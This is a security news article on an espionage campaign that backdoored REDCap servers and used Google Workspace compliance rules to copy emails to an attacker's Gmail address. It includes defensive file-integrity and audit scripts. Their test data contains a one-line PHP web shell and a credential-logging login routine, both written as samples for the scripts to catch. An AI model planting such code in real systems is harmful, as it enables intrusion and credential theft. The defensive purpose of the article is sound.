
How Hackers Turned Google Workspace into a Data-Siphoning Tool—and What It Means for Research Labs

By Mag-Info Tech editorial · 2026-06-16


A China-linked espionage group spent more than a year inside North American medical, academic, and military research networks, quietly stealing sensitive emails by hijacking Google Workspace rules and planting a backdoor on REDCap research servers. The attackers did not need to break encryption or deploy malware on every employee laptop. Instead, they rewired the victims’ own Google Workspace settings so that any message matching a list of keywords was silently copied to an attacker-controlled Gmail address. Once inside, the group also moved laterally to gain domain administrator rights, giving them broad access to internal systems and data.

The campaign shows how cloud collaboration tools, designed to simplify sharing and compliance, can be repurposed for data theft when attackers gain even a small foothold. For research institutions that rely on REDCap for clinical trials and Google Workspace for day-to-day communication, the incident is a reminder that email and database platforms can become silent pipelines for exfiltration if administrative controls are not tightly managed.

A Backdoor on REDCap: The Initial Compromise

The entry point was REDCap, a widely used web platform that hospitals, universities, and military health institutions rely on to build and manage study databases. According to a detailed report, the group—tracked by analysts as UNC6508—compromised externally facing REDCap servers, planting a backdoor that stole login credentials. The initial access vector remains unclear; analysts have not linked the intrusion to a specific software flaw or version. Instead, they observed the group probing older, vulnerable instances, suggesting that unpatched or misconfigured servers were the likely targets.

Once inside, the attackers deployed custom malware named INFINITERED, which trojanizes REDCap’s own system files. This malware performs internal reconnaissance, pulling database and service account credentials. With these credentials, the group moved deeper into the network, eventually reaching a domain administrator account. The timeline shows the earliest known compromise occurred in September 2023, with activity continuing through at least November 2025. During this period, the group operated quietly, avoiding detection while gathering sensitive information.
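INFINITERED worked by replacing REDCap's own files, so the most direct detection on the server side is a file-integrity check of the web application root against a known-good baseline. The following is an added example written for this article, not REDCap's code or anything from the analysts' report: the directory layout, file contents and the simulated tampering are all constructed for illustration.

```python
"""File-integrity check for a web application root, to catch trojanized
application files of the kind INFINITERED replaced on REDCap servers.
Added example for this article, not REDCap's or the analysts' code; the
directory layout and file contents below are constructed for illustration."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict:
    """Map every regular file under root (POSIX-style relative path) to its
    SHA-256 hex digest. Symlinks are skipped so a baseline entry cannot be
    satisfied by pointing the name at an unrelated file."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_against_baseline(baseline: dict, current: dict) -> dict:
    """Compare a fresh hash_tree() against a stored baseline. Entries under
    'modified' and 'added' inside application code directories are the ones
    to preserve and analyse; redeploying over them destroys the evidence."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Baseline a constructed web root, then simulate the two changes a
    trojanized deployment typically shows (a core file rewritten to capture
    credentials, a new script dropped into a writable directory) and return
    what the check reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "webroot"  # constructed; stands in for the REDCap document root
        (root / "includes").mkdir(parents=True)
        (root / "uploads").mkdir()
        (root / "index.php").write_text("<?php require 'includes/auth.php'; ?>\n")
        (root / "includes" / "auth.php").write_text(
            "<?php function login($u, $p) { return check($u, $p); } ?>\n")
        (root / "includes" / "db.php").write_text("<?php $dsn = 'mysql:host=db'; ?>\n")

        # The baseline comes from a known-good deployment and lives outside
        # the web root (here a sibling file); in practice keep it on another
        # host or sign it, since a root-level attacker can rewrite local copies.
        baseline_file = Path(tmp) / "baseline.json"
        baseline_file.write_text(json.dumps(hash_tree(root), indent=2))

        # Simulated compromise: the auth routine now also logs credentials,
        # and a script appears in an upload directory that should hold no code.
        (root / "includes" / "auth.php").write_text(
            "<?php function login($u, $p) { file_put_contents('/tmp/.c', $u . ':' . $p . PHP_EOL, FILE_APPEND); return check($u, $p); } ?>\n")
        (root / "uploads" / "cache.php").write_text("<?php system($_GET['c']); ?>\n")

        baseline = json.loads(baseline_file.read_text())
        return diff_against_baseline(baseline, hash_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run from cron against the real document root and alert on any non-empty `modified` or `added` list outside directories that are expected to change (user uploads, caches). Re-baseline only after a deliberate upgrade, and from the vendor package rather than from whatever is currently on disk.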

For research institutions, the lesson is clear: even trusted platforms like REDCap can become gateways for attackers if they are exposed to the internet and not kept fully patched. Many organizations deploy REDCap for sensitive health and defense-related studies, making it a high-value target. The fact that the initial access vector remains unidentified underscores the need for continuous monitoring and prompt patching, especially for externally facing applications.

From Credentials to Admin Rights: Lateral Movement

After harvesting credentials from the REDCap server, the group pivoted to lateral movement within the victim’s network. They used the stolen logins to access internal systems and escalate privileges, ultimately gaining control of a domain administrator account. Analysts have not detailed the exact path taken to reach this level of access, but the progression suggests a methodical approach: first, compromise a low-value but credential-rich system, then use those credentials to move toward higher-value targets.


Domain administrator rights are particularly dangerous because they allow attackers to modify policies, create new accounts, and access nearly any resource on the network. In this case, the group's goal was not just to steal data but to set up a persistent exfiltration channel. One caveat: a domain administrator in the on-premises directory does not by itself hold Google Workspace administrator rights, and the report as summarized here does not say how the group reached the Workspace admin console. A domain admin can, however, typically recover credentials for synced identities, control single sign-on infrastructure, and harvest admin passwords or sessions left on domain-joined machines. However it was obtained, Workspace admin access let the group configure mail rules without raising immediate suspicion, ensuring that their data theft would continue undetected for months.

For IT teams in research institutions, this phase of the attack highlights the importance of least-privilege access and strict credential hygiene. Service accounts and database logins should be tightly controlled, and domain admin credentials should be reserved for emergency use only. Regular audits of privileged accounts and unusual login patterns can help detect lateral movement before attackers reach critical systems.

Weaponizing Google Workspace Rules: The Exfiltration Trick

The most unusual and effective part of the campaign was how the attackers exfiltrated data. Instead of relying on malware to siphon emails from individual devices, they abused a legitimate Google Workspace feature called content compliance rules. These rules allow administrators to scan incoming and outgoing mail for specific keywords, phrases, or email addresses, and then automatically copy or forward matching messages to another address.

The group created a rule containing a misspelled keyword, "Patroit", that watched for nearly 150 keywords, search terms, and email addresses. When a message matched any of these terms, Google Workspace silently added an attacker-controlled Gmail address as a BCC recipient. Because the copy is made by Google's own mail servers as the message is processed, transport encryption and endpoint protections never come into play; the victims' email system had itself become the exfiltration pipeline. Google has since disabled the rogue rule and the attacker-controlled inbox, but the damage had already been done.

This technique is stealthy because it uses built-in functionality, avoiding the need for malware on end-user devices. It also scales well: once the rule is in place, every matching message that passes through the domain from that point on is copied automatically, with no further action by the attacker. Content compliance rules act on mail in transit, so the rule does not reach back into existing mailboxes; harvesting older mail would require mailbox access through another route. For research institutions handling sensitive health, defense, or academic data, this means that even well-secured email systems can be turned against them if administrative controls are not properly managed.

Why Research Institutions Are Prime Targets


The victims spanned multiple sectors: clinical providers, academic medical centers, military health institutions, advocacy groups, and health regulators. These organizations are attractive to espionage groups because they handle sensitive data on behalf of governments, universities, and defense contractors. REDCap is commonly used to manage clinical trials, patient data, and research protocols, making it a treasure trove for attackers seeking intellectual property or classified information.


The timing of the campaign is also notable. The earliest compromise dates to September 2023, with activity continuing through at least November 2025. This prolonged presence suggests that the attackers were not opportunistic but rather highly focused on long-term intelligence gathering. For institutions involved in defense-related research, the risk is especially acute, as stolen data could compromise national security or give adversaries a competitive edge in sensitive fields.

Moreover, the use of Google Workspace rules for exfiltration demonstrates how attackers adapt to their targets’ technology stacks. Many research institutions rely on Google Workspace for collaboration, making it a familiar and trusted environment. When attackers can abuse built-in features, they reduce the need for custom malware, lowering the chance of detection and increasing the likelihood of success.

Practical Steps to Detect and Prevent Similar Attacks

For research institutions and other high-value targets, there are concrete steps to reduce the risk of a similar campaign. First, restrict external access to REDCap and other research platforms. Use VPNs, IP allowlisting, and multi-factor authentication to ensure that only authorized users can log in. Regularly patch and update all software, especially externally facing applications, and monitor for unusual login attempts or credential harvesting.

Second, tighten Google Workspace administration. Limit who can create or modify content compliance and routing rules, require multi-factor authentication (ideally phishing-resistant security keys) for all admin accounts, and keep those accounts separate from the accounts administrators use for daily work. Audit existing rules regularly to ensure none add recipients or forward messages to addresses outside the organization's own domains, and review the Admin audit log for changes to Gmail settings, which records who created or modified a rule, when, and from which IP address. Treat any rule that delivers mail to a consumer mail domain as an incident until proven otherwise.

Third, implement network segmentation and least-privilege access. Ensure that service accounts and database logins have only the permissions they need, and avoid using domain admin credentials for routine tasks. Monitor lateral movement by tracking unusual login patterns or access to privileged accounts. Regular audits of admin activity can help detect signs of compromise early.

Finally, invest in threat detection and response capabilities. Deploy endpoint detection and response tools to monitor for suspicious activity on research servers, add file-integrity monitoring on web application roots (INFINITERED worked by modifying REDCap's own files), and use network traffic analysis to spot unusual data flows. Establish clear incident response procedures so that security teams can quickly contain and remediate any breach.
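The rule audit called for in the exfiltration section above and in the second step here can be automated from the Admin audit log. The following is an added example written for this article, not Google's code or anything from the analysts' report. The event records are constructed to resemble Admin SDK Reports API "admin" activities; the event type EMAIL_SETTINGS, the event name CHANGE_GMAIL_SETTING, the parameter names SETTING_NAME and NEW_VALUE, the organization domain and every address shown are assumptions or placeholders, to be checked against the Reports API documentation and your own tenant.

```python
"""Audit Google Workspace Admin log events for content-compliance or routing
rule changes that deliver mail outside the organization, the pattern behind
the 'Patroit' rule. Added example for this article, not Google's or the
analysts' code. Event/parameter names and all addresses are assumptions."""
import re

ORG_DOMAINS = {"example.org"}  # assumption: the tenant's verified domains

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed sample: a legitimate archive rule, an unrelated admin event, and
# a rogue rule that adds an external Gmail recipient. All values are placeholders.
SAMPLE_ACTIVITIES = [
    {
        "id": {"time": "2024-03-04T09:12:33.000Z", "applicationName": "admin"},
        "actor": {"email": "it-admin@example.org"},
        "ipAddress": "192.0.2.10",
        "events": [{
            "type": "EMAIL_SETTINGS", "name": "CHANGE_GMAIL_SETTING",
            "parameters": [
                {"name": "SETTING_NAME", "value": "Content compliance: Legal hold archive"},
                {"name": "NEW_VALUE", "value": "Match: any; Also deliver to: legal-archive@example.org"},
            ],
        }],
    },
    {
        "id": {"time": "2024-03-05T14:01:07.000Z", "applicationName": "admin"},
        "actor": {"email": "it-admin@example.org"},
        "ipAddress": "192.0.2.10",
        "events": [{"type": "USER_SETTINGS", "name": "CREATE_USER",
                    "parameters": [{"name": "USER_EMAIL", "value": "new.hire@example.org"}]}],
    },
    {
        "id": {"time": "2024-09-18T02:47:51.000Z", "applicationName": "admin"},
        "actor": {"email": "it-admin@example.org"},
        "ipAddress": "198.51.100.77",
        "events": [{
            "type": "EMAIL_SETTINGS", "name": "CHANGE_GMAIL_SETTING",
            "parameters": [
                {"name": "SETTING_NAME", "value": "Content compliance: Patroit"},
                {"name": "NEW_VALUE", "value": "Match: any of keyword list; Also deliver to: research-archive1@gmail.com"},
            ],
        }],
    },
]


def _params(event: dict) -> dict:
    """Flatten the Reports API parameter list into a name -> value dict."""
    return {p["name"]: str(p.get("value", "")) for p in event.get("parameters", [])}


def external_addresses(text: str, org_domains=ORG_DOMAINS) -> list:
    """Every email address in text whose domain is not one of ours (case-insensitive)."""
    found = {a.lower() for a in EMAIL_RE.findall(text)}
    return sorted(a for a in found if a.rsplit("@", 1)[1] not in org_domains)


def audit(activities: list, org_domains=ORG_DOMAINS) -> list:
    """Return one finding per Gmail compliance/routing rule change whose new
    value references an address outside org_domains. Actor, time and source
    IP are kept because the rule itself says nothing about who planted it."""
    findings = []
    for act in activities:
        for ev in act.get("events", []):
            if ev.get("type") != "EMAIL_SETTINGS":
                continue
            p = _params(ev)
            setting = p.get("SETTING_NAME", "")
            if not any(k in setting.lower() for k in ("compliance", "routing")):
                continue
            ext = external_addresses(p.get("NEW_VALUE", ""), org_domains)
            if ext:
                findings.append({
                    "time": act.get("id", {}).get("time"),
                    "actor": act.get("actor", {}).get("email"),
                    "ip": act.get("ipAddress"),
                    "setting": setting,
                    "external": ext,
                })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_ACTIVITIES):
        print(f"{f['time']} {f['actor']} from {f['ip']}: '{f['setting']}' -> {', '.join(f['external'])}")
```

In production, pull the records with the Admin SDK Reports API (in the Python client, `reports().activities().list(userKey="all", applicationName="admin", eventName="CHANGE_GMAIL_SETTING")`) and pass the returned `items` to `audit()`; a scheduled run that alerts on any non-empty result turns the periodic audit into a detection. The domain allowlist deliberately does not exempt Google's own consumer domains, since an attacker-controlled Gmail address is exactly what this campaign used.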


The UNC6508 campaign is part of a broader trend in which state-linked groups abuse legitimate cloud and collaboration tools for espionage. As more organizations migrate to cloud platforms like Google Workspace, Microsoft 365, and Slack, attackers are shifting their focus from endpoint malware to abusing built-in features. These platforms offer powerful administrative tools that can be repurposed for data theft, making them attractive targets for sophisticated groups.

Analysts expect this trend to continue, with attackers increasingly leveraging cloud-native features for persistence, exfiltration, and command-and-control. Features like email forwarding rules, third-party app integrations, and automated workflows can all be abused if not properly secured. Research institutions, in particular, should be vigilant, as their reliance on cloud platforms and specialized research tools makes them vulnerable to similar attacks.

For the cybersecurity community, the challenge is to balance usability with security. Cloud platforms are designed to be flexible and user-friendly, but that flexibility can also be exploited. Security teams must work closely with administrators to ensure that powerful features are used responsibly and that monitoring is in place to detect abuse. As attackers grow more sophisticated, defenders must adapt by focusing on visibility, least-privilege access, and rapid response.

Conclusion

The UNC6508 campaign demonstrates how attackers can turn trusted platforms into silent pipelines for data theft. By compromising a REDCap server and then abusing Google Workspace rules, the group spent more than a year quietly stealing sensitive emails from research institutions across North America. The attack highlights the need for research labs to harden their externally facing platforms, tightly control administrative privileges, and monitor cloud environments for signs of abuse.

For organizations that handle sensitive data, the message is clear: the tools designed to simplify collaboration can also become tools for espionage if not properly secured. By implementing strong access controls, regular audits, and robust monitoring, research institutions can reduce the risk of falling victim to similar campaigns and protect their critical research and intellectual property.
